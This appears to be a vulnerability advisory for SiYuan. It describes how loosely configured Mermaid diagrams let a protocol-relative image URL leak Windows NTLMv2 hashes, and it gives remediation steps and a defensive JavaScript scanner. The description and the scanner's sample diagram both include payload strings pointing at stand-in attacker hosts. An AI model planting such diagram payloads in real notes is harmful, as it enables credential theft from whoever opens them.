CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Description
SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL. On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker. This vulnerability is fixed in 3.6.4.
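One defensive check for the note-rendering path described above, as an added example that is not SiYuan's or Mermaid.js's own code: it audits Mermaid diagram text before rendering, flags `<img>` elements whose `src` is protocol-relative (the `//host/path` form Windows resolves as a UNC path) and strips that `src` so the diagram still renders without an outbound request. The function names and the sample diagram are constructed; treating a leading `\\` the same way goes beyond the page's `//` case and is an assumption.

```javascript
// Added example (not SiYuan's or Mermaid.js's code): pre-render audit of Mermaid
// diagram source for <img> src values that Windows would resolve as a UNC path
// (//host/share/x.png -> \\host\share\x.png) and answer with an SMB auth attempt.
// Assumption beyond the page: a leading "\\" is treated like "//".

// Matches an <img ...> tag and captures its src whether double-quoted,
// single-quoted or bare.
const IMG_TAG_RE = /<img\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>/gi;
const SRC_ATTR_RE = /\bsrc\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/i;

// True when, after trimming and normalising backslashes to slashes, the value
// starts with "//" and so would be interpreted as a UNC path on Windows.
function resolvesAsUncPath(src) {
  return src.trim().replace(/\\/g, "/").startsWith("//");
}

// Scans a Mermaid diagram string. Returns the findings (offending src and tag)
// and a copy of the diagram with each offending src attribute neutralised.
function auditMermaidSource(diagram) {
  const findings = [];
  const sanitized = diagram.replace(IMG_TAG_RE, (tag, dq, sq, bare) => {
    const src = dq ?? sq ?? bare ?? "";
    if (!resolvesAsUncPath(src)) return tag;
    findings.push({ src, tag });
    // Swap the src for an inert attribute so nothing is fetched when rendered.
    return tag.replace(SRC_ATTR_RE, 'data-blocked-src=""');
  });
  return { findings, sanitized };
}

// Constructed sample note: one benign https image and one protocol-relative one.
const SAMPLE_DIAGRAM = `flowchart LR
  A["<img src='https://example.org/ok.png'> safe label"] --> B["<img src="//attacker.example/x.png"> label"]`;

const result = auditMermaidSource(SAMPLE_DIAGRAM);
console.log(JSON.stringify(result.findings)); // one finding: src "//attacker.example/x.png"
console.log(result.sanitized);
```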
Analysis
NTLM credential theft in SiYuan personal knowledge management system (prior to 3.6.4) allows remote attackers to capture Windows user password hashes without authentication or user interaction. Misconfigured Mermaid.js rendering with securityLevel:loose permits unsanitized <img> tags within SVG foreignObject blocks. …
Remediation
Within 24 hours: Inventory all SiYuan deployments and verify installed versions; disable Mermaid diagram rendering in SiYuan settings if available. Within 7 days: Implement network-level blocking of outbound SMB (port 445) and NetBIOS (ports 137-139) traffic from SiYuan client systems to untrusted networks; restrict SiYuan note sharing to verified internal users only; force password reset for all Windows domain accounts that may have accessed SiYuan notes. …
External POC / Exploit Code
EUVD-2026-21148
GHSA-w95v-4h65-j455